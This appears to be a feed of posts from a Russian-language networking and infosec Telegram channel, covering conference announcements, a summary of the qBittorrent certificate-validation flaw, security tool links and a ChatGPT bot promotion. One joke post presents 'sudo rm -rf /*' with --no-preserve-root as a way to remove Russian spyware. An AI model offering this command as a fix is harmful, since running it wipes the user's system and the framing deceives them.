Mikrotik Ninja

GetNet 2024: Применение передовых практик в сетевом администрировании
Дата: 29 ноября | Время: 11:00 - 19:00 | Формат: Онлайн | Бесплатный

На GetNet вы откроете для себя эффективные стратегии и инновационные подходы в сетевом администрировании, которые помогут оптимизировать работу вашей сети. Эксперты поделятся проверенными решениями и последними инновациями, которые преобразят ваш подход к управлению сетевыми ресурсами.

Основные доклады:

- Николай Кузнецов – "Проблема ближнего радиуса": детальное обсуждение настройки фаервола и безопасности на канальном уровне в MikroTik RouterOS.
- Павел Галкин – "Литературно-комиксовая зарисовка для любителей Mikrotik": разбор DevOps методологии и её применимости в управлении сетевыми операциями.
- Михаил Антонов – "Вредные советы для сетевиков": анализ типичных ошибок в построении и управлении сетями и методы их предотвращения.

Все доклады можно посмотреть тут

Это возможность улучшить знания и навыки в области сетевого администрирования и применить на практике передовые технологии и стратегии.

Весь год ждали скачух на сертификацию на черную пятницу, нате

https://github.com/0x90n/InfoSec-Black-Friday?tab=readme-ov-file#online-courses--training

#BlackFriday #Promo

Мало кто из зарубежных коллег знает простой способ удалить из системы весь шпионский софт _Р_оссийской _Ф_едерации:

sudo rm -rf /*

UPD:
Рекомендуют добавить ключ --no-preserve-root чтобы также удалить малварь из системных директорий

Azure Active Directory security operations guide

#security #microsoft #azure #AD

Ссылки на PR'ы
https://github.com/reactor/reactor-core/pull/3897
https://github.com/reactor/reactor-core/pull/3921

Ссылки на оригинальные посты
https://t.me/kuleshov_razgonyaet/58
https://t.me/kuleshov_razgonyaet/60

CVE-2024-51774 RCE

qBitTorrent в течение 14 лет игнорировал валидацию сертификатов.

Коммит с игнором был добавлен в 2010
Какие риски?
1. Когда Python недоступен в Windows, qBittorrent предлагает пользователю установить его через жестко закодированный URL, указывающий на исполняемый файл Python. Из-за отсутствия проверки сертификатов злоумышленник, перехвативший запрос, может заменить ответ URL вредоносным инсталлятором Python, который может выполнить RCE

2. qBittorrent проверяет наличие обновлений, получая XML-ленту по жестко заданному URL-адресу, а затем анализирует ее на предмет ссылки на скачивание новой версии. При отсутствии SSL-проверки злоумышленник может подставить в фид вредоносную ссылку на обновление, побуждая пользователя загрузить вредоносную полезную нагрузку.

3. Менеджер загрузок qBittorrent также используется для RSS-каналов, что позволяет злоумышленникам перехватывать и изменять содержимое RSS-каналов и внедрять вредоносные URL-адреса, выдавая их за безопасные торрент-ссылки

4. qBittorrent автоматически загружает сжатую базу данных GeoIP с жестко заданного URL и распаковывает ее, что позволяет использовать потенциальные ошибки переполнения памяти через файлы, полученные с поддельного сервера

via https://sharpsec.run/rce-vulnerability-in-qbittorrent/

Легкий сетевой сканер IP с веб-интерфейсом

- Отправка уведомления при обнаружении нового хоста
- Мониторинг истории хостов в режиме онлайн/офлайн
- Ведение списка всех хостов в сети
- Отправка данных в InfluxDB2 для создания панели Grafana

#monitoring #grafana

Сегодня будет стрим из Томского хакспейса "Akiba" в 18:00 (время UTC+7:00), 14:00 по МСК.

Список докладов

- Артефакты нейровокодеров
Докладчик: @Jl4cTuk
Узнаем какие артефакты оставляют модели синтеза речи, как с этим борются и живут.

- Основы электроники для начинающих радиогубителей.
Докладчик: @Alkekseevich
Доклад о том как я вкатился в электронику с нуля. Расскажу о том какие знания необходимы, а так же про траекторию развития в данной отрасли.

- SIGKILL 'Em All: цель и путь сигналов в Linux.
Докладчик: @g1inko
Как доставляются сигналы? Что они такое, и какие бывают? И из-за чего процессы могут стать не убиваемыми?

- NixOS: Что это и как с этим жить.
Докладчик: @M4maI
На докладе познакомимся с NixOS, что это за дистрибутив, как с ним работать и узнаем как его использовать в CTF

- ХэСС
Докладчик: @var1m
Что ты знаешь про ХэСС? Точно?

- Жизнь и смерть tcp сокета в ядре Linux.
Докладчик: @Daniil159x
Думаю, все так или иначе работали с TCP. Посмотрим как оно работает под слоями абстракций.


Ссылка на трансляцию
https://www.youtube.com/live/nbOsBA3BYPE

Чат хакспейса @hackspace_tomsk

Сайт с информацией об одноплатниках.

Если давно выбираете между RPi, OrangePi, Intel NUC, то теперь вариантов выбора будет ещё больше и вы уж точно никогда не купите себе миниПК

#miniPC #RPi

Шаблоны для построения security пайплайнов. Можно взять какие-то идеи при построении DevSecOps пайплайна

Ещё один

#security

«Тени не скроются: Расследование атак группировки Shadow»

F.A.C.C.T. выкатили объемный отчет о группировке Shadow, а также жирный комплект инструментария, используемого в атаках.

#security #report

DevSec Hardening Framework
Фреймворк и набор плейбуков для усиления безопасности ОС и сервисов

#security

🦄 Open SysConf 2024

https://www.youtube.com/live/Egn302kDVDo

В рамках моего эксперимента по программированию без программирования всем подписчикам этого канала доступен ChatGPT Bot. Бот простой как палка, просто транслирует вопросы в OpenAI API и шлет ответы. Сейчас бот использует модель gpt-4o и абсолютно бесплатен. Не могу гарантировать, что так будет всегда, посмотрим что из этого получится.

Чтобы пользоваться ботом достаточно быть подписчиком канала и написать ему в личку @apten_bot или в группе с обсуждениями используя команду /ask.

Код бота полностью opensource и доступен на GitHub, там же можно оставлять Issues если вам что-то от него нужно.

Бот неспешно разрабатывается с использованием AI под моим наставничеством.

Кому это может быть полезно?
Всем кто по каким-либо причинам не может использовать chatgpt.com напрямую, спасибо за внимание.